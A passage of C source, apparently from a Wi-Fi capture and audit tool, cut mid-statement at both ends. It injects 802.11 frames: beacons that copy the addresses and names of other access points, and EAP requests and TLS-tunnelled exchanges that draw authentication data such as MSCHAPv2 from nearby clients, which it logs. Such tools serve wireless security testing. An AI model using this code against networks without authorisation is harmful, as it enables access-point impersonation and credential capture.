&hdradiotap, HDRRT_SIZE); macftx = (mac_t*)(packetoutptr +HDRRT_SIZE); macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_BEACON; memcpy(macftx->addr1, &mac_broadcast, 6); memcpy(macftx->addr2, rgbeaconlistptr->ap, 6); memcpy(macftx->addr3, rgbeaconlistptr->ap, 6); macftx->sequence = myreactivebeaconsequence++ << 4; if(myreactivebeaconsequence >= 4096) myreactivebeaconsequence = 1; capap = (capap_t*)(packetoutptr +HDRRT_SIZE +MAC_SIZE_NORM); capap->timestamp = mytime++; capap->beaconintervall = BEACONINTERVALL; capap->capabilities = 0x411; packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE] = 0; packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +1] = rgbeaconlistptr->essidlen; memcpy(&packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +IETAG_SIZE], rgbeaconlistptr->essid, rgbeaconlistptr->essidlen); if(((rgbeaconlistptr->akm & TAK_PMKSA) == TAK_PMKSA) || ((rgbeaconlistptr->akm & TAK_PMKSA256) == TAK_PMKSA256)) { memcpy(&packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +IETAG_SIZE +rgbeaconlistptr->essidlen], &reactivebeaconwpaentdata, reactivebeaconwpaentdatalen); packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +IETAG_SIZE +rgbeaconlistptr->essidlen +reactivebeaconwpaentdatachanoffset] = ptrfscanlist->channel; send_packet(fd_socket, HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +IETAG_SIZE +rgbeaconlistptr->essidlen +reactivebeaconwpaentdatalen, "failed to transmit internal beacon"); } else { memcpy(&packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +IETAG_SIZE +rgbeaconlistptr->essidlen], &reactivebeacondata, reactivebeacondatalen); packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +IETAG_SIZE +rgbeaconlistptr->essidlen +reactivebeacondatachanoffset] = ptrfscanlist->channel; send_packet(fd_socket, HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +IETAG_SIZE +rgbeaconlistptr->essidlen +reactivebeacondatalen, "failed to transmit internal beacon"); } rgbeaconlistptr++; return; } /*===========================================================================*/ static void send_beacon_hidden() { static mac_t *macftx; static capap_t *capap; packetoutptr = epbown +EPB_SIZE; memset(packetoutptr, 0, HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +bcbeacondatahiddenlen +1); memcpy(packetoutptr, &hdradiotap, HDRRT_SIZE); macftx = (mac_t*)(packetoutptr +HDRRT_SIZE); macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_BEACON; memcpy(macftx->addr1, &mac_broadcast, 6); memcpy(macftx->addr2, &mac_myaphidden, 6); memcpy(macftx->addr3, &mac_myaphidden, 6); macftx->sequence = myreactivebeaconsequence++ << 4; if(myreactivebeaconsequence >= 4096) myreactivebeaconsequence = 1; capap = (capap_t*)(packetoutptr +HDRRT_SIZE +MAC_SIZE_NORM); capap->timestamp = mytime++; capap->beaconintervall = BEACONINTERVALL; capap->capabilities = 0x411; packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE] = 0; memcpy(&packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE], &bcbeacondatahidden, bcbeacondatahiddenlen); packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +bcbeacondatahiddenchanoffset] = ptrfscanlist->channel; send_packet(fd_socket, HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +bcbeacondatahiddenlen, "failed to transmit internal beacon"); return; } /*===========================================================================*/ static void send_beacon_open() { static mac_t *macftx; static capap_t *capap; packetoutptr = epbown +EPB_SIZE; memset(packetoutptr, 0, HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +bcbeacondataopenlen +1); memcpy(packetoutptr, &hdradiotap, HDRRT_SIZE); macftx = (mac_t*)(packetoutptr +HDRRT_SIZE); macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_BEACON; memcpy(macftx->addr1, &mac_broadcast, 6); memcpy(macftx->addr2, &mac_myapopen, 6); memcpy(macftx->addr3, &mac_myapopen, 6); macftx->sequence = myreactivebeaconsequence++ << 4; if(myreactivebeaconsequence >= 4096) myreactivebeaconsequence = 1; capap = (capap_t*)(packetoutptr +HDRRT_SIZE +MAC_SIZE_NORM); capap->timestamp = mytime++; capap->beaconintervall = BEACONINTERVALL; capap->capabilities = 0x401; packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE] = 0; memcpy(&packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE], &bcbeacondataopen, bcbeacondataopenlen); packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +bcbeacondataopenchanoffset] = ptrfscanlist->channel; send_packet(fd_socket, HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +bcbeacondataopenlen, "failed to transmit internal beacon"); return; } /*===========================================================================*/ /*===========================================================================*/ static inline void process80211exteap_mka() { if(fd_pcapng > 0) { if((pcapngframesout &PCAPNG_FRAME_EAP) == PCAPNG_FRAME_EAP) writeepb(fd_pcapng); } return; } /*===========================================================================*/ static inline void process80211exteap_asf() { if(fd_pcapng > 0) { if((pcapngframesout &PCAPNG_FRAME_EAP) == PCAPNG_FRAME_EAP) writeepb(fd_pcapng); } return; } /*===========================================================================*/ static inline void send_eap(uint8_t eapoltype, uint8_t code, uint8_t id, uint8_t eaptype, uint8_t *data, size_t data_len) { static mac_t *macftx; static eapauth_t *eapauth; static exteap_t *exteap; static size_t eapdata_len; static uint8_t eapdata[] = { 0xaa, 0xaa, 0x03, 0x00, 0x00, 0x00, 0x88, 0x8e, 0x01, 0x00, 0x00, 0x05, 0x01, 0x63, 0x00, 0x05, 0x01 }; #define EAP_DATA_SIZE sizeof(eapdata) packetoutptr = epbown +EPB_SIZE; memset(packetoutptr, 0, HDRRT_SIZE +MAC_SIZE_QOS +LLC_SIZE +EAPAUTH_SIZE +data_len +1); memcpy(packetoutptr, &hdradiotap, HDRRT_SIZE); macftx = (mac_t*)(packetoutptr +HDRRT_SIZE); macftx->type = IEEE80211_FTYPE_DATA; macftx->subtype = IEEE80211_STYPE_QOS_DATA; memcpy(macftx->addr1, macfrx->addr2, 6); memcpy(macftx->addr2, macfrx->addr1, 6); memcpy(macftx->addr3, macfrx->addr1, 6); macftx->from_ds = 1; macftx->duration = 0x002c; macftx->sequence = myapsequence++ << 4; if(myapsequence >= 4096) myapsequence = 1; memcpy(&packetoutptr[HDRRT_SIZE +MAC_SIZE_QOS], &eapdata, EAP_DATA_SIZE); eapauth = (eapauth_t*)&packetoutptr[HDRRT_SIZE +MAC_SIZE_QOS +LLC_SIZE]; exteap = (exteap_t*)&packetoutptr[HDRRT_SIZE +MAC_SIZE_QOS +LLC_SIZE +EAPAUTH_SIZE]; eapauth->type = eapoltype; eapdata_len = 0; if(eapoltype == EAPOL_START || eapoltype == EAPOL_LOGOFF) { eapdata_len = (LLC_SIZE +EAPAUTH_SIZE); eapauth->len = 0; } else { switch(code) { case EAP_CODE_REQ: case EAP_CODE_RESP: eapdata_len = (LLC_SIZE +EAPAUTH_SIZE +EXTEAP_SIZE); eapauth->len = htons(EXTEAP_SIZE +data_len); break; case EAP_CODE_INITIATE: case EAP_CODE_FINISH: if(data_len == 0) { eapdata_len = (LLC_SIZE +EAPAUTH_SIZE +EXTEAP_SIZE -1); eapauth->len = htons(EXTEAP_SIZE -1); } else { eapdata_len = (LLC_SIZE +EAPAUTH_SIZE +EXTEAP_SIZE); eapauth->len = htons(EXTEAP_SIZE +data_len); } break; case EAP_CODE_SUCCESS: case EAP_CODE_FAILURE: eapdata_len = (LLC_SIZE +EAPAUTH_SIZE +EXTEAP_SIZE -1); eapauth->len = htons(EXTEAP_SIZE -1); break; }; exteap->len = eapauth->len; exteap->code = code; exteap->id = id; exteap->type = eaptype; } if(data_len > 0) memcpy(&packetoutptr[HDRRT_SIZE +MAC_SIZE_QOS +eapdata_len], data, data_len); packetlenown = HDRRT_SIZE +MAC_SIZE_QOS +eapdata_len +data_len; send_packet(fd_socket, HDRRT_SIZE +MAC_SIZE_QOS +eapdata_len +data_len, "failed to transmit EAP packet"); gettimeofday(&tvpacketsent, NULL); memcpy(packetsent, packetoutptr, packetlenown); packetsentlen = packetlenown; packetsenttries = PACKET_RESEND_COUNT_MAX; packetsentflag = true; outgoingcount++; return; } /*===========================================================================*/ static inline void resend_packet() { static int fdnum; static fd_set txfds; static struct timespec tsfdtx; static mac_t *macftx; static char timestring[16]; tsfdtx.tv_sec = 0; tsfdtx.tv_nsec = FDNSECTXTIMER; FD_ZERO(&txfds); FD_SET(fd_socket, &txfds); if(packetsenttries == 0) { packetsentflag = false; return; } macftx = (mac_t*)(&packetsent[HDRRT_SIZE]); macftx->sequence = myapsequence++ << 4; if(myapsequence >= 4096) myapsequence = 1; macftx->retry = 1; fdnum = pselect(fd_socket +1, NULL, &txfds, NULL, &tsfdtx, NULL); if(fdnum < 0) { errorcount++; return; } if(FD_ISSET(fd_socket, &txfds)) { if(packetsentlen != write(fd_socket, &packetsent, packetsentlen)) { strftime(timestring, 16, "%H:%M:%S", localtime(&tv.tv_sec)); fprintf(stdout, "%s %d/%d socket write error: failed to retransmit EAP packet\n", timestring, ptrfscanlist->frequency, ptrfscanlist->channel); errorcount++; return; } fsync(fd_socket); outgoingcount++; gettimeofday(&tvpacketsent, NULL); packetsenttries--; if(packetsenttries == 0) packetsentflag = false; return; } strftime(timestring, 16, "%H:%M:%S", localtime(&tv.tv_sec)); fprintf(stdout, "%s %d/%d driver is busy: failed to retransmit EAP packet\n", timestring, ptrfscanlist->frequency, ptrfscanlist->channel); return; } /*===========================================================================*/ static inline void send_eap_request(uint8_t id, uint8_t eaptype, uint8_t *requestdata, size_t requestdata_len) { send_eap(EAP_PACKET, EAP_CODE_REQ, id, eaptype, requestdata, requestdata_len); return; } /*===========================================================================*/ static inline void send_eap_status_resp(uint8_t code, uint8_t id, uint8_t eaptype) { send_eap(EAP_PACKET, code, id, eaptype, NULL, 0); return; } /*===========================================================================*/ static inline void send_eap_request_id(eapctx_t *eapctx) { if(eapctx == NULL) send_eap_request(0, EAP_TYPE_ID, NULL, 0); else { eapctx->id++; send_eap_request(eapctx->id, EAP_TYPE_ID, NULL, 0); } return; } /*===========================================================================*/ static inline void send_eap_tls(eapctx_t *eapctx, uint8_t *data, size_t datalen) { static int res; static int outlen; static uint32_t outlen_n; uint8_t tlsflags = eapctx->version; #ifdef DEBUG_TLS snprintf(debugmsg, DEBUGMSG_MAX, "TLS connection write len=%d, id=%d:", (int)datalen, eapctx->id +1); debugprint((int)datalen, data, debugmsg); #endif res = SSL_write(eaptlsctx->ssl, data, datalen); outlen = BIO_pending(eaptlsctx->tls_out); #ifdef DEBUG_TLS snprintf(debugmsg, DEBUGMSG_MAX, "TLS BIO out len=%d", outlen); debugprint(0, NULL, debugmsg); #endif if(outlen > (int)(EAP_LEN_MAX -EXTEAP_SIZE -EAP_TLSFLAGS_SIZE)) { tlsflags |= (EAP_TLSFLAGS_MORE_FRAGMENTS | EAP_TLSFLAGS_LENGTH_INCL); eaptlsctx->fragments_tx = true; eaptlsctx->tlslen = outlen; eaptlsctx->buflen = EAP_LEN_MAX -EXTEAP_SIZE -EAP_TLSFLAGS_SIZE -EAP_TLSLENGTH_SIZE; outlen_n = htonl(outlen); memcpy(&eaptlsctx->buf[EAP_TLSFLAGS_SIZE], &outlen_n, EAP_TLSLENGTH_SIZE); res = BIO_read(eaptlsctx->tls_out, (void*)&eaptlsctx->buf[EAP_TLSFLAGS_SIZE +EAP_TLSLENGTH_SIZE], EAPTLSCTX_BUF_SIZE); res = eaptlsctx->buflen +EAP_TLSLENGTH_SIZE; eaptlsctx->txpos = res +EAP_TLSFLAGS_SIZE; #ifdef DEBUG_TLS snprintf(debugmsg, DEBUGMSG_MAX, "TLS out sending 1.fragment len=%d", res); debugprint(0, NULL, debugmsg); #endif } else { eaptlsctx->fragments_tx = false; res = BIO_read(eaptlsctx->tls_out, (void*)&eaptlsctx->buf[EAP_TLSFLAGS_SIZE], EAPTLSCTX_BUF_SIZE); if(res < 0) res = 0; } eaptlsctx->buf[0] = tlsflags; eapctx->id++; send_eap_request(eapctx->id, eapctx->type, &eaptlsctx->buf[0], res +EAP_TLSFLAGS_SIZE); return; } /*===========================================================================*/ static inline void send_eap_tls_eap(eapctx_t *eapctx, uint8_t code, uint8_t id, uint8_t eaptype, uint8_t *data, size_t data_len) { static uint8_t outbuf[EXTEAP_SIZE +EAP_LEN_MAX]; static exteap_t *exteap; static size_t exteaplen = 0; exteap = (exteap_t*)&outbuf[0]; exteap->code = code; exteap->id = id; exteap->type = eaptype; switch(code) { default: case EAP_CODE_REQ: case EAP_CODE_RESP: exteaplen = EXTEAP_SIZE; break; case EAP_CODE_INITIATE: case EAP_CODE_FINISH: if(data_len == 0) { exteaplen = (EXTEAP_SIZE -1); } else { exteaplen = EXTEAP_SIZE; } break; case EAP_CODE_SUCCESS: case EAP_CODE_FAILURE: exteaplen = (EXTEAP_SIZE -1); break; } exteaplen += data_len; exteap->len = htons(exteaplen); memcpy(exteap->data, data, data_len); send_eap_tls(eapctx, outbuf, exteaplen); if(fd_pcapng > 0) switch(eaptype) { case EAP_TYPE_MSCHAPV2: case EAP_TYPE_MSEAP: writeepbown_peap(fd_pcapng, outbuf, exteaplen); } } /*===========================================================================*/ static inline void send_eap_tls_eap_request(eapctx_t *eapctx, uint8_t id, uint8_t eaptype, uint8_t *data, size_t data_len) { send_eap_tls_eap(eapctx, EAP_CODE_REQ, id, eaptype, data, data_len); } /*===========================================================================*/ /*===========================================================================*/ static inline void printown(ownlist_t *zeiger, char *msg) { static int c, p; static macessidlist_t *zeigerap; static char timestring[16]; static char essidstring[ESSID_LEN_MAX *2 +1]; p = 0; for(c = 0; c < zeiger->essidlen; c++) { if((zeiger->essid[c] < 0x20) || (zeiger->essid[c] > 0x7e)) essidstring[p++] = '.'; else if(zeiger->essid[c] == 0x5c) { essidstring[p++] = 0x5c; essidstring[p++] = 0x5c; } else essidstring[p++] = zeiger->essid[c]; } essidstring[p] = 0; if(essidstring[0] == 0) { for(zeigerap = aplist; zeigerap < aplist +APLIST_MAX; zeigerap++) { if(memcmp(zeigerap->ap, zeiger->ap, 6) == 0) { p = 0; for(c = 0; c < zeigerap->essidlen; c++) { if((zeigerap->essid[c] < 0x20) || (zeigerap->essid[c] > 0x7e)) essidstring[p++] = '.'; else if(zeigerap->essid[c] == 0x5c) { essidstring[p++] = 0x5c; essidstring[p++] = 0x5c; } else essidstring[p++] = zeigerap->essid[c]; } essidstring[p] = 0; break; } } } if(essidstring[0] == 0) { for(zeigerap = rglist; zeigerap < rglist +RGLIST_MAX; zeigerap++) { if(memcmp(zeigerap->ap, zeiger->ap, 6) == 0) { p = 0; for(c = 0; c < zeigerap->essidlen; c++) { if((zeigerap->essid[c] < 0x20) || (zeigerap->essid[c] > 0x7e)) essidstring[p++] = '.'; else if(zeigerap->essid[c] == 0x5c) { essidstring[p++] = 0x5c; essidstring[p++] = 0x5c; } else essidstring[p++] = zeigerap->essid[c]; } essidstring[p] = 0; break; } } } strftime(timestring, 16, "%H:%M:%S", localtime(&tv.tv_sec)); if(essidstring[0] != 0) { if(ptrfscanlist->channel >= 100) snprintf(servermsg, SERVERMSG_MAX, "%s %d/%d %02x%02x%02x%02x%02x%02x %02x%02x%02x%02x%02x%02x %s [%s]\n", timestring, ptrfscanlist->frequency, ptrfscanlist->channel, zeiger->client[0], zeiger->client[1], zeiger->client[2], zeiger->client[3], zeiger->client[4], zeiger->client[5], zeiger->ap[0], zeiger->ap[1], zeiger->ap[2], zeiger->ap[3], zeiger->ap[4], zeiger->ap[5], essidstring, msg); else if(ptrfscanlist->channel >= 10) snprintf(servermsg, SERVERMSG_MAX, "%s %d/%d %02x%02x%02x%02x%02x%02x %02x%02x%02x%02x%02x%02x %s [%s]\n", timestring, ptrfscanlist->frequency, ptrfscanlist->channel, zeiger->client[0], zeiger->client[1], zeiger->client[2], zeiger->client[3], zeiger->client[4], zeiger->client[5], zeiger->ap[0], zeiger->ap[1], zeiger->ap[2], zeiger->ap[3], zeiger->ap[4], zeiger->ap[5], essidstring, msg); else snprintf(servermsg, SERVERMSG_MAX, "%s %d/%d %02x%02x%02x%02x%02x%02x %02x%02x%02x%02x%02x%02x %s [%s]\n", timestring, ptrfscanlist->frequency, ptrfscanlist->channel, zeiger->client[0], zeiger->client[1], zeiger->client[2], zeiger->client[3], zeiger->client[4], zeiger->client[5], zeiger->ap[0], zeiger->ap[1], zeiger->ap[2], zeiger->ap[3], zeiger->ap[4], zeiger->ap[5], essidstring, msg); } else { if(ptrfscanlist->channel >= 100) snprintf(servermsg, SERVERMSG_MAX, "%s %d/%d %02x%02x%02x%02x%02x%02x %02x%02x%02x%02x%02x%02x [ESSID NOT RECEIVED YET] [%s]\n", timestring, ptrfscanlist->frequency, ptrfscanlist->channel, zeiger->client[0], zeiger->client[1], zeiger->client[2], zeiger->client[3], zeiger->client[4], zeiger->client[5], zeiger->ap[0], zeiger->ap[1], zeiger->ap[2], zeiger->ap[3], zeiger->ap[4], zeiger->ap[5], msg); else if(ptrfscanlist->channel >= 10) snprintf(servermsg, SERVERMSG_MAX, "%s %d/%d %02x%02x%02x%02x%02x%02x %02x%02x%02x%02x%02x%02x [ESSID NOT RECEIVED YET] [%s]\n", timestring, ptrfscanlist->frequency, ptrfscanlist->channel, zeiger->client[0], zeiger->client[1], zeiger->client[2], zeiger->client[3], zeiger->client[4], zeiger->client[5], zeiger->ap[0], zeiger->ap[1], zeiger->ap[2], zeiger->ap[3], zeiger->ap[4], zeiger->ap[5], msg); else snprintf(servermsg, SERVERMSG_MAX, "%s %d/%d %02x%02x%02x%02x%02x%02x %02x%02x%02x%02x%02x%02x [ESSID NOT RECEIVED YET] [%s]\n", timestring, ptrfscanlist->frequency, ptrfscanlist->channel, zeiger->client[0], zeiger->client[1], zeiger->client[2], zeiger->client[3], zeiger->client[4], zeiger->client[5], zeiger->ap[0], zeiger->ap[1], zeiger->ap[2], zeiger->ap[3], zeiger->ap[4], zeiger->ap[5], msg); } if(((statusout &STATUS_SERVER) == STATUS_SERVER) && (fd_socket_mcsrv > 0)) serversendstatus(servermsg, strlen(servermsg)); else fprintf(stdout, "%s", servermsg); return; } /*===========================================================================*/ static inline char *eap_type2name(uint8_t type) { static char outstr[4]; switch(type) { case EAP_TYPE_PEAP: return "EAP-PEAP"; case EAP_TYPE_TTLS: return "EAP-TTLS"; case EAP_TYPE_TLS: return "EAP-TLS"; case EAP_TYPE_NAK: return "NAK"; case EAP_TYPE_GTC: return "GTC"; case EAP_TYPE_MSEAP: case EAP_TYPE_MSCHAPV2: return "MSCHAPV2"; case EAP_TYPE_NOTIFY: return "NOTIFY"; case EAP_TYPE_PWD: return "EAP-PWD"; case EAP_TYPE_SIM: return "EAP-SIM"; case EAP_TYPE_AKA: return "EAP-AKA"; case EAP_TYPE_AKA1: return "EAP-AKA'"; case EAP_TYPE_MD5: return "EAP-MD5-CHALLENGE"; default: sprintf(outstr, "%d", type); return outstr; } return outstr; } /*===========================================================================*/ static inline char *strclean(char *str, int strlen) { static int c, p; static char outstr[STATUSMSG_MAX]; if(strlen > STATUSMSG_MAX -1) strlen = STATUSMSG_MAX -1; p = 0; for(c = 0; c < strlen; c++) { if((str[c] < 0x20) || (str[c] > 0x7e)) outstr[p++] = '.'; else if(str[c] == 0x5c) { if((p +2) >= (STATUSMSG_MAX -1)) break; outstr[p++] = 0x5c; outstr[p++] = 0x5c; } else outstr[p++] = str[c]; if(p == (STATUSMSG_MAX -1)) break; } outstr[p] = 0; return outstr; } /*===========================================================================*/ static inline void process80211exteap_resp_id(uint16_t exteaplen) { static ownlist_t *zeiger; if(exteaplen < EAPAUTH_SIZE) return; if((macfrx->to_ds == 1) && (macfrx->from_ds == 0)) { if(((timestamp -lastauthtimestamp) <= eapoltimeoutvalue) || ((lastauthkeyver == 0) && ((timestamp -lastauthtimestamp) <= eapoleaptimeoutvalue))) { if(memcmp(&lastauthap, macfrx->addr1, 6) == 0) send_ack(); } for(zeiger = ownlist; zeiger < ownlist +OWNLIST_MAX; zeiger++) { if(zeiger->timestamp == 0) break; if(memcmp(zeiger->ap, macfrx->addr1, 6) != 0) continue; if(memcmp(zeiger->client, macfrx->addr2, 6) != 0) continue; zeiger->timestamp = timestamp; if((zeiger->status &FILTERED) == FILTERED) return; if((eapreqflag == true) && (zeiger->eapctx.id == 0)) { while(zeiger->eapctx.reqstate < eapreqentries) { if(eapreqlist[zeiger->eapctx.reqstate].mode == EAPREQLIST_MODE_TLS) { if(zeiger->eapctx.reqstate > 0) { zeiger->eapctx.reqstate--; continue; } else { while(++zeiger->eapctx.reqstate < eapreqentries) { if(eapreqlist[zeiger->eapctx.reqstate].mode == EAPREQLIST_MODE_TLS) continue; break; } } } zeiger->eapctx.id++; zeiger->eapctx.type = eapreqlist[zeiger->eapctx.reqstate].type; send_eap_request(zeiger->eapctx.id, eapreqlist[zeiger->eapctx.reqstate].type, eapreqlist[zeiger->eapctx.reqstate].data, eapreqlist[zeiger->eapctx.reqstate].length); break; } } if((zeiger->status &OW_EAP_RESP) != OW_EAP_RESP) { zeiger->status |= OW_EAP_RESP; if(fd_pcapng > 0) { if((pcapngframesout &PCAPNG_FRAME_MANAGEMENT) == PCAPNG_FRAME_MANAGEMENT) writeepb(fd_pcapng); } if((statusout &STATUS_EAP) == STATUS_EAP) printown(zeiger, "EAP RESPONSE ID"); } return; } memset(zeiger, 0, OWNLIST_SIZE); zeiger->timestamp = timestamp; zeiger->status = OW_EAP_RESP; memcpy(zeiger->ap, macfrx->addr1, 6); memcpy(zeiger->client, macfrx->addr2, 6); if(filtermode != 0) { if(setclientfilter(zeiger) == true) { qsort(ownlist, zeiger -ownlist +1, OWNLIST_SIZE, sort_ownlist_by_time); return; } } if(fd_pcapng > 0) { if((pcapngframesout &PCAPNG_FRAME_MANAGEMENT) == PCAPNG_FRAME_MANAGEMENT) writeepb(fd_pcapng); } if((statusout &STATUS_EAP) == STATUS_EAP) printown(zeiger, "EAP RESPONSE ID"); qsort(ownlist, zeiger -ownlist +1, OWNLIST_SIZE, sort_ownlist_by_time); return; } if((macfrx->to_ds == 0) && (macfrx->from_ds == 1)) { for(zeiger = ownlist; zeiger < ownlist +OWNLIST_MAX; zeiger++) { if(zeiger->timestamp == 0) break; if(memcmp(zeiger->ap, macfrx->addr2, 6) != 0) continue; if(memcmp(zeiger->client, macfrx->addr1, 6) != 0) continue; zeiger->timestamp = timestamp; if((zeiger->status &FILTERED) == FILTERED) return; if((zeiger->status &OW_EAP_RESP) != OW_EAP_RESP) { zeiger->status |= OW_EAP_RESP; if(fd_pcapng > 0) { if((pcapngframesout &PCAPNG_FRAME_MANAGEMENT) == PCAPNG_FRAME_MANAGEMENT) writeepb(fd_pcapng); } if(fh_nmea != NULL) writegpwpl(macfrx->addr2); } if((statusout &STATUS_EAP) == STATUS_EAP) printown(zeiger, "EAP RESPONSE ID"); return; } memset(zeiger, 0, OWNLIST_SIZE); zeiger->timestamp = timestamp; zeiger->status = OW_EAP_REQ; memcpy(zeiger->ap, macfrx->addr2, 6); memcpy(zeiger->client, macfrx->addr1, 6); if(filtermode != 0) { if(setclientfilter(zeiger) == true) { qsort(ownlist, zeiger -ownlist +1, OWNLIST_SIZE, sort_ownlist_by_time); return; } } if(fd_pcapng > 0) { if((pcapngframesout &PCAPNG_FRAME_MANAGEMENT) == PCAPNG_FRAME_MANAGEMENT) writeepb(fd_pcapng); } if(fh_nmea != NULL) writegpwpl(macfrx->addr2); if((statusout &STATUS_EAP) == STATUS_EAP) printown(zeiger, "EAP RESPONSE ID"); qsort(ownlist, zeiger -ownlist +1, OWNLIST_SIZE, sort_ownlist_by_time); return; } return; } /*===========================================================================*/ static inline void process80211exteap_req_id(uint16_t exteaplen) { static ownlist_t *zeiger; if(exteaplen < EAPAUTH_SIZE) return; if((macfrx->to_ds == 1) && (macfrx->from_ds == 0)) { for(zeiger = ownlist; zeiger < ownlist +OWNLIST_MAX; zeiger++) { if(zeiger->timestamp == 0) break; if(memcmp(zeiger->ap, macfrx->addr1, 6) != 0) continue; if(memcmp(zeiger->client, macfrx->addr2, 6) != 0) continue; zeiger->timestamp = timestamp; if((zeiger->status &FILTERED) == FILTERED) return; if((zeiger->status &OW_EAP_REQ) != OW_EAP_REQ) { zeiger->status |= OW_EAP_REQ; if(fd_pcapng > 0) { if((pcapngframesout &PCAPNG_FRAME_MANAGEMENT) == PCAPNG_FRAME_MANAGEMENT) writeepb(fd_pcapng); } if((statusout &STATUS_EAP) == STATUS_EAP) printown(zeiger, "EAP REQUEST ID"); } return; } memset(zeiger, 0, OWNLIST_SIZE); zeiger->timestamp = timestamp; zeiger->status = OW_EAP_REQ; memcpy(zeiger->ap, macfrx->addr1, 6); memcpy(zeiger->client, macfrx->addr2, 6); if(filtermode != 0) { if(setclientfilter(zeiger) == true) { qsort(ownlist, zeiger -ownlist +1, OWNLIST_SIZE, sort_ownlist_by_time); return; } } if(fd_pcapng > 0) { if((pcapngframesout &PCAPNG_FRAME_MANAGEMENT) == PCAPNG_FRAME_MANAGEMENT) writeepb(fd_pcapng); } if((statusout &STATUS_EAP) == STATUS_EAP) printown(zeiger, "EAP REQUEST ID"); qsort(ownlist, zeiger -ownlist +1, OWNLIST_SIZE, sort_ownlist_by_time); return; } if((macfrx->to_ds == 0) && (macfrx->from_ds == 1)) { for(zeiger = ownlist; zeiger < ownlist +OWNLIST_MAX; zeiger++) { if(zeiger->timestamp == 0) break; if(memcmp(zeiger->ap, macfrx->addr2, 6) != 0) continue; if(memcmp(zeiger->client, macfrx->addr1, 6) != 0) continue; zeiger->timestamp = timestamp; if((zeiger->status &FILTERED) == FILTERED) return; if((zeiger->status &OW_EAP_REQ) != OW_EAP_REQ) { zeiger->status |= OW_EAP_REQ; if(fd_pcapng > 0) { if((pcapngframesout &PCAPNG_FRAME_MANAGEMENT) == PCAPNG_FRAME_MANAGEMENT) writeepb(fd_pcapng); } if(fh_nmea != NULL) writegpwpl(macfrx->addr2); } if((statusout &STATUS_EAP) == STATUS_EAP) printown(zeiger, "EAP REQUEST ID"); return; } memset(zeiger, 0, OWNLIST_SIZE); zeiger->timestamp = timestamp; zeiger->status = OW_EAP_REQ; memcpy(zeiger->ap, macfrx->addr2, 6); memcpy(zeiger->client, macfrx->addr1, 6); if(filtermode != 0) { if(setclientfilter(zeiger) == true) { qsort(ownlist, zeiger -ownlist +1, OWNLIST_SIZE, sort_ownlist_by_time); return; } } if(fd_pcapng > 0) { if((pcapngframesout &PCAPNG_FRAME_MANAGEMENT) == PCAPNG_FRAME_MANAGEMENT) writeepb(fd_pcapng); } if(fh_nmea != NULL) writegpwpl(macfrx->addr2); if((statusout &STATUS_EAP) == STATUS_EAP) printown(zeiger, "EAP REQUEST ID"); qsort(ownlist, zeiger -ownlist +1, OWNLIST_SIZE, sort_ownlist_by_time); return; } return; } /*===========================================================================*/ static inline int eapreqlist_gettype(eapctx_t *eapctx, uint8_t type) { static int i; for(i = eapctx->reqstate; i < eapreqentries; i++) { if(eapreqlist[i].type == type) return i; } return 0; } /*===========================================================================*/ static inline void process80211exteap_resp(uint16_t exteaplen) { static ownlist_t *zeiger; static uint8_t *eapauthptr; static exteap_t *exteap; static eapctx_t *eapctx; static int eapreqentry; eapauthptr = payloadptr +LLC_SIZE +EAPAUTH_SIZE; exteap = (exteap_t*)eapauthptr; char outstr[DEBUGMSG_MAX]; if(exteaplen < EAPAUTH_SIZE) return; if((macfrx->to_ds == 1) && (macfrx->from_ds == 0)) { if((eapreqflag == true) && (lastauthkeyver == 0) && ((timestamp -lastauthtimestamp) <= eapoleaptimeoutvalue)) { if(memcmp(&lastauthap, macfrx->addr1, 6) == 0) send_ack(); } for(zeiger = ownlist; zeiger < ownlist +OWNLIST_MAX; zeiger++) { if(zeiger->timestamp == 0) break; if(memcmp(zeiger->ap, macfrx->addr1, 6) != 0) continue; if(memcmp(zeiger->client, macfrx->addr2, 6) != 0) continue; zeiger->timestamp = timestamp; if((zeiger->status &FILTERED) == FILTERED) return; if(fd_pcapng > 0) { if((pcapngframesout &PCAPNG_FRAME_MANAGEMENT) == PCAPNG_FRAME_MANAGEMENT) writeepb(fd_pcapng); } if(eapreqflag == true) { eapctx = &zeiger->eapctx; if(exteap->id > eapctx->id) return; if(eapctx->reqstate == eapreqentries) return; if((((exteap->type != EAP_TYPE_NAK) && ((statusout &STATUS_EAP) == STATUS_EAP)) || ((exteap->type == EAP_TYPE_NAK) && ((statusout &STATUS_EAP_NAK) == STATUS_EAP_NAK))) && (exteap->id == eapctx->id)) { #ifdef DEBUG_TLS if(exteap->type == EAP_TYPE_NAK) sprintf(outstr, "EAP RESPONSE TYPE NAK:%s EAPTIME:%" PRIu64 " ID:%d REQ:%d%s%s" , eap_type2name(exteap->data[0]), timestamp -lastauthtimestamp, exteap->id, zeiger->eapctx.reqstate, zeiger->eapctx.tlstun ? " TLS":"", (zeiger->eapctx.reqstate == (eapreqentries 